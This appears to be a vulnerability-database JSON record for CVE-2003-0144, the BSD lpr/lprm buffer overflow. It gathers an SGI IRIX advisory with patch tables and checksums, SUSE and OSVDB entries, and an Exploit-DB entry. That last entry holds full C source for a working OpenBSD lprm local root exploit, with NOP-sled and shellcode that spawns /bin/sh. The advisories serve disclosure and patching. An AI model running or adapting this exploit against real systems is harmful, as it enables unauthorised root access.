by default on IRIX 6.5 systems. It is\r\nan optional product which can be installed as "print.sw.bsdlpr".\r\n\r\nTo determine the version of IRIX you are running, execute the following\r\ncommand:\r\n\r\n # /bin/uname -R\r\n\r\nThat will return a result similar to the following:\r\n\r\n # 6.5 6.5.19f\r\n\r\nThe first number ("6.5") is the release name, the second ("6.5.16f" in this\r\ncase) is the extended release name. The extended release name is the\r\n"version" we refer to throughout this document.\r\n\r\nTo see if the bsdlpr subsystem is installed, execute the following command:\r\n\r\n $ versions print.sw.bsdlpr\r\n I = Installed, R = Removed\r\n\r\n Name Date Description\r\n I print 01/30/2003 Printing Tools, Release 1.16.5f\r\n I print.sw 01/30/2003 Printing Tools Software 1.16.5f\r\n I print.sw.bsdlpr 01/30/2003 Berkeley 'lpr' Printer Spooler\r\n\r\nIf the output shown is similar to the above, then the subsystem is installed\r\nand the system may be vulnerable.\r\n\r\n\r\n\r\n- ----------------------------\r\n- --- Temporary Workaround ---\r\n- ----------------------------\r\n\r\nThere is no effective workaround available for these problems if the bsdlpr\r\ncapabilities are needed in your printing environment. SGI recommends either\r\nupgrading to IRIX 6.5.20 (when available), or installing the appropriate\r\npatch from the listing below.\r\n\r\n\r\n- ----------------\r\n- --- Solution ---\r\n- ----------------\r\n\r\nSGI has provided a series of patches for these vulnerabilities. Our\r\nrecommendation is to upgrade to IRIX 6.5.20 when available, or install the\r\nappropriate patch.\r\n\r\nSecurity patches are available on both http://support.sgi.com/ and\r\nftp://patches.sgi.com/support/free/security/patches/\r\n\r\n\r\n OS Version Vulnerable? Patch # Other Actions\r\n ---------- ----------- ------- -------------\r\n IRIX 3.x unknown Note 1\r\n IRIX 4.x unknown Note 1\r\n IRIX 5.x unknown Note 1\r\n IRIX 6.0.x unknown Note 1\r\n IRIX 6.1 unknown Note 1\r\n IRIX 6.2 unknown Note 1\r\n IRIX 6.3 unknown Note 1\r\n IRIX 6.4 unknown Note 1\r\n IRIX 6.5 yes Notes 2 & 3\r\n IRIX 6.5.1 yes Notes 2 & 3\r\n IRIX 6.5.2 yes Notes 2 & 3\r\n IRIX 6.5.3 yes Notes 2 & 3\r\n IRIX 6.5.4 yes Notes 2 & 3\r\n IRIX 6.5.5 yes Notes 2 & 3\r\n IRIX 6.5.6 yes Notes 2 & 3\r\n IRIX 6.5.7 yes Notes 2 & 3\r\n IRIX 6.5.8 yes Notes 2 & 3\r\n IRIX 6.5.9 yes Notes 2 & 3\r\n IRIX 6.5.10 yes Notes 2 & 3\r\n IRIX 6.5.11 yes Notes 2 & 3\r\n IRIX 6.5.12 yes Notes 2 & 3\r\n IRIX 6.5.13 yes Notes 2 & 3\r\n IRIX 6.5.14 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.15 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.16 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.17 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.18 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.19 yes 5071 Notes 2, 3, & 4\r\n IRIX 6.5.20 no\r\n\r\n NOTES\r\n\r\n 1) This version of the IRIX operating has been retired. Upgrade to an\r\n actively supported IRIX operating system. See\r\n http://support.sgi.com/ for more information.\r\n\r\n 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact\r\n your SGI Support Provider or URL: http://support.sgi.com/\r\n\r\n 3) Upgrade to IRIX 6.5.20 (when available)\r\n\r\n 4) Install the patch or upgrade to IRIX 6.5.20 (when available)\r\n Security patches are available on both http://support.sgi.com/ and\r\n ftp://patches.sgi.com/support/free/security/patches/\r\n Note that the patch does include all the fixes that were originally\r\n in patch 4835 and 5048.\r\n\r\n ##### Patch File Checksums ####\r\n\r\nThe actual patch will be a tar file containing the following files:\r\n\r\nFilename: README.patch.5071\r\nAlgorithm #1 (sum -r): 21383 8 README.patch.5071\r\nAlgorithm #2 (sum): 57354 8 README.patch.5071\r\nMD5 checksum: 9B471EF86C10DC32F837B1FDD044529A\r\n\r\nFilename: patchSG0005071\r\nAlgorithm #1 (sum -r): 22998 3 patchSG0005071\r\nAlgorithm #2 (sum): 42262 3 patchSG0005071\r\nMD5 checksum: 63AC61757D175E073D95B27E2D5D2A44\r\n\r\nFilename: patchSG0005071.idb\r\nAlgorithm #1 (sum -r): 12029 3 patchSG0005071.idb\r\nAlgorithm #2 (sum): 52574 3 patchSG0005071.idb\r\nMD5 checksum: 4001E601B65EFE361F5EE694023EFA5A\r\n\r\nFilename: patchSG0005071.print_sw\r\nAlgorithm #1 (sum -r): 29965 266 patchSG0005071.print_sw\r\nAlgorithm #2 (sum): 10328 266 patchSG0005071.print_sw\r\nMD5 checksum: F3740393AEAE2EB9C89CCBA326EC8373\r\n\r\n\r\n- ------------------------\r\n- --- Acknowledgments ----\r\n- ------------------------\r\n\r\nSGI wishes to thank the U.S. Air Force, NASA and the users of the Internet Community at large\r\nfor their assistance in this matter.\r\n\r\n\r\n- -------------\r\n- --- Links ---\r\n- -------------\r\n\r\nSGI Security Advisories can be found at:\r\nhttp://www.sgi.com/support/security/ and\r\nftp://patches.sgi.com/support/free/security/advisories/\r\n\r\nSGI Security Patches can be found at:\r\nhttp://www.sgi.com/support/security/ and\r\nftp://patches.sgi.com/support/free/security/patches/\r\n\r\nSGI patches for IRIX can be found at the following patch servers:\r\nhttp://support.sgi.com/ and ftp://patches.sgi.com/\r\n\r\nSGI freeware updates for IRIX can be found at:\r\nhttp://freeware.sgi.com/\r\n\r\nSGI fixes for SGI open sourced code can be found on:\r\nhttp://oss.sgi.com/projects/\r\n\r\nSGI patches and RPMs for Linux can be found at:\r\nhttp://support.sgi.com/\r\n\r\nSGI patches for Windows NT or 2000 can be found at:\r\nhttp://support.sgi.com/\r\n\r\nIRIX 5.2-6.4 Recommended/Required Patch Sets can be found at:\r\nhttp://support.sgi.com/ and ftp://patches.sgi.com/support/patchset/\r\n\r\nIRIX 6.5 Maintenance Release Streams can be found at:\r\nhttp://support.sgi.com/\r\n\r\nIRIX 6.5 Software Update CDs can be obtained from:\r\nhttp://support.sgi.com/\r\n\r\nThe primary SGI anonymous FTP site for security advisories and patches is\r\npatches.sgi.com (216.32.174.211). Security advisories and patches are\r\nlocated under the URL ftp://patches.sgi.com/support/free/security/\r\n\r\nFor security and patch management reasons, ftp.sgi.com (mirrors\r\npatches.sgi.com security FTP repository) lags behind and does not do a\r\nreal-time update.\r\n\r\n\r\n- -----------------------------------------\r\n- --- SGI Security Information/Contacts ---\r\n- -----------------------------------------\r\n\r\nIf there are questions about this document, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\n ------oOo------\r\n\r\nSGI provides security information and patches for use by the entire SGI\r\ncommunity. This information is freely available to any person needing the\r\ninformation and is available via anonymous FTP and the Web.\r\n\r\nThe primary SGI anonymous FTP site for security advisories and patches is\r\npatches.sgi.com (216.32.174.211). Security advisories and patches are\r\nlocated under the URL ftp://patches.sgi.com/support/free/security/\r\n\r\nThe SGI Security Headquarters Web page is accessible at the URL:\r\nhttp://www.sgi.com/support/security/\r\n\r\nFor issues with the patches on the FTP sites, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\nFor assistance obtaining or working with security patches, please\r\ncontact your SGI support provider.\r\n\r\n ------oOo------\r\n\r\nSGI provides a free security mailing list service called wiretap and\r\nencourages interested parties to self-subscribe to receive (via email) all\r\nSGI Security Advisories when they are released. Subscribing to the mailing\r\nlist can be done via the Web\r\n(http://www.sgi.com/support/security/wiretap.html) or by sending email to\r\nSGI as outlined below.\r\n\r\n% mail wiretap-request@sgi.com\r\nsubscribe wiretap <YourEmailAddress such as aaanalyst@sgi.com >\r\nend\r\n^d\r\n\r\nIn the example above, <YourEmailAddress> is the email address that you wish\r\nthe mailing list information sent to. The word end must be on a separate\r\nline to indicate the end of the body of the message. The control-d (^d) is\r\nused to indicate to the mail program that you are finished composing the\r\nmail message.\r\n\r\n\r\n ------oOo------\r\n\r\nSGI provides a comprehensive customer World Wide Web site. This site is\r\nlocated at http://www.sgi.com/support/security/ .\r\n\r\n ------oOo------\r\n\r\nIf there are general security questions on SGI systems, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\nFor reporting *NEW* SGI security issues, email can be sent to\r\nsecurity-alert@sgi.com or contact your SGI support provider. A support\r\ncontract is not required for submitting a security report.\r\n\r\n______________________________________________________________________________\r\n This information is provided freely to all interested parties\r\n and may be redistributed provided that it is not altered in any\r\n way, SGI is appropriately credited and the document retains and\r\n includes its valid PGP signature.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n\r\niQCVAwUBPqlwkbQ4cFApAP75AQGkWAQAgh7Jw6prsrtxjXy7Wft7zDNoLpkWKj6S\r\nrYhtkk+bc0T2n6gj0qBYbvEi/LXQff/civlaaB9zgaETcARPB02Zq0eFd4SiJAEq\r\nmXHEyUwTxqyI+7JzVXrYBSIDpmSChFM2HPlDDkvelM98xh/Xdy48Rolq0XkOTYwG\r\njS/UH1gQNc4=\r\n=Cssm\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2003-04-26T00:00:00", "title": "Multiple Vulnerabilities in BSD LPR Subsystem on IRIX update", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:07", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0144"], "modified": "2003-04-26T00:00:00", "id": "SECURITYVULNS:DOC:4451", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4451", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:27:55", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "3.0.48-297", "packageName": "lprold", "packageFilename": "lprold-3.0.48-297.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.1", "packageVersion": "3.0.48-297", "packageName": "lprold", "packageFilename": "lprold-3.0.48-297.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.1", "packageVersion": "3.0.48-407", "packageName": "lprold", "packageFilename": "lprold-3.0.48-407.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "3.0.48-408", "packageName": "lprold", "packageFilename": "lprold-3.0.48-408.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.2", "packageVersion": "3.0.48-407", "packageName": "lprold", "packageFilename": "lprold-3.0.48-407.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.1", "packageVersion": "3.0.48-270", "packageName": "lprold", "packageFilename": "lprold-3.0.48-270.alpha.rpm", "arch": "alpha", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "3.0.48-273", "packageName": "lprold", "packageFilename": "lprold-3.0.48-273.sparc.rpm", "arch": "sparc", "operator": "lt"}], "description": "The lprm command of the printing package lprold shipped till SuSE 7.3 contains a buffer overflow. This buffer overflow can be exploited by a local user, if the printer system is set up correctly, to gain root privileges. lprold is installed as default package and has the setuid bit set.", "edition": 1, "reporter": "Suse", "published": "2003-03-13T16:07:16", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "title": "local privilege escalation in lprold", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-03-13T16:07:16", "id": "SUSE-SA:2003:0014", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00015.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.openbsd.org/errata32.html#lprm)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104690434504429&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=104714441925019&w=2\nMail List Post: http://marc.info/?l=bugtraq&m=104690434504429&w=2\nISS X-Force ID: 11473\n[CVE-2003-0144](https://vulners.com/cve/CVE-2003-0144)\nBugtraq ID: 7025\n", "reporter": "Arne Woerner()", "published": "2003-03-05T00:00:00", "title": "lprold lpr Package lprm Command Line Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0144"], "modified": "2003-03-05T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:7549", "id": "OSVDB:7549", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T18:30:34", "osvdbidlist": ["7549"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (2). CVE-2003-0144. Local exploit for unix platform", "reporter": "CMN", "published": "1998-04-22T00:00:00", "type": "exploitdb", "title": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 2", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0144"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "1998-04-22T00:00:00", "id": "EDB-ID:22332", "href": "https://www.exploit-db.com/exploits/22332/", "sourceData": "source: http://www.securityfocus.com/bid/7025/info\r\n \r\nIt has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.\r\n\r\n/*\r\n * lprmexp.c\r\n *\r\n * OpenBSD <= 3.1 lprm(1) local root exploit\r\n *\r\n * By CMN <cmn@darklab.org>/<md0claes@mdstud.chalmers.se>\r\n *\r\n * Tested on OpenBSD 3.0 and 3.1.\r\n *\r\n * Fiddle with -a option from 1 to 7 to indent address in\r\n * buffer.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <sys/types.h>\r\n\r\n#define LPRMPROG \"/usr/bin/lprm\"\r\n#define BUFSIZE 511\r\n#define OFFSET 0\r\n#define NOP 0x90\r\n\r\nstatic char obsdcode[] =\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xb0\\xb7\" /* movb $0xb7, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\x19\" /* movb $0x19, %al */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\x17\" /* movb $0x17, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\x2b\" /* movb $0x2b, %al */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\xb0\\xb5\" /* movb $0xb5, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */\r\n \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */\r\n \"\\x89\\xe3\" /* movl %esp, %ebx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x89\\xe2\" /* movl %esp, %edx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x52\" /* pushl %edx */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xb0\\x3b\" /* movb $0x3b, %al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x31\\xc0\" /* xorl %eax, %eax */\r\n \"\\x40\" /* inc %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\xcd\\x80\"; /* int $0x80 */\r\n\r\nu_long\r\ngetesp(void)\r\n{\r\n __asm__(\"movl %esp, %eax\");\r\n}\r\n\r\nvoid\r\nusage(u_char *pname)\r\n{\r\n printf(\"\\n** OpenBSD lprm(1) local root exploit by CMN **\\n\");\r\n printf(\"\\nUsage: %s printer [-o offs] [-r ret] [-a indent]\\n\\n\",\r\n pname);\r\n}\r\n\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n int i;\r\n u_char indent = 0;\r\n u_long raddr = 0;\r\n u_long offset = 0;\r\n u_char buf[BUFSIZE+1];\r\n\r\n if (argc < 2) {\r\n usage(argv[0]);\r\n exit(1);\r\n }\r\n\r\n argc--;\r\n argv++;\r\n\r\n while ( (i = getopt(argc, argv, \"a:r:o:\")) != -1) {\r\n switch (i) {\r\n case 'a':\r\n indent = atoi(optarg) % 8;\r\n break;\r\n\r\n case 'r':\r\n raddr = strtoul(optarg, NULL, 0);\r\n break;\r\n\r\n case 'o':\r\n offset = strtoul(optarg, NULL, 0);\r\n break;\r\n\r\n default:\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n if (!raddr) {\r\n raddr = getesp();\r\n raddr -= offset ? offset : OFFSET;\r\n }\r\n else\r\n raddr -= offset;\r\n\r\n printf(\"Using address 0x%08x\\n\", raddr);\r\n\r\n memset(buf, NOP, BUFSIZE);\r\n memcpy(&buf[BUFSIZE-(indent+4)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+8)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+12)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+16)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+20)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE-(indent+24)], &raddr, sizeof(raddr));\r\n memcpy(&buf[BUFSIZE]-(strlen(obsdcode)+100),\r\n obsdcode, strlen(obsdcode));\r\n buf[BUFSIZE] = '\\0';\r\n\r\n execlp(LPRMPROG, \"CMN\", \"-P\", argv[0], buf, buf, NULL);\r\n exit(1);\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/22332/"}]}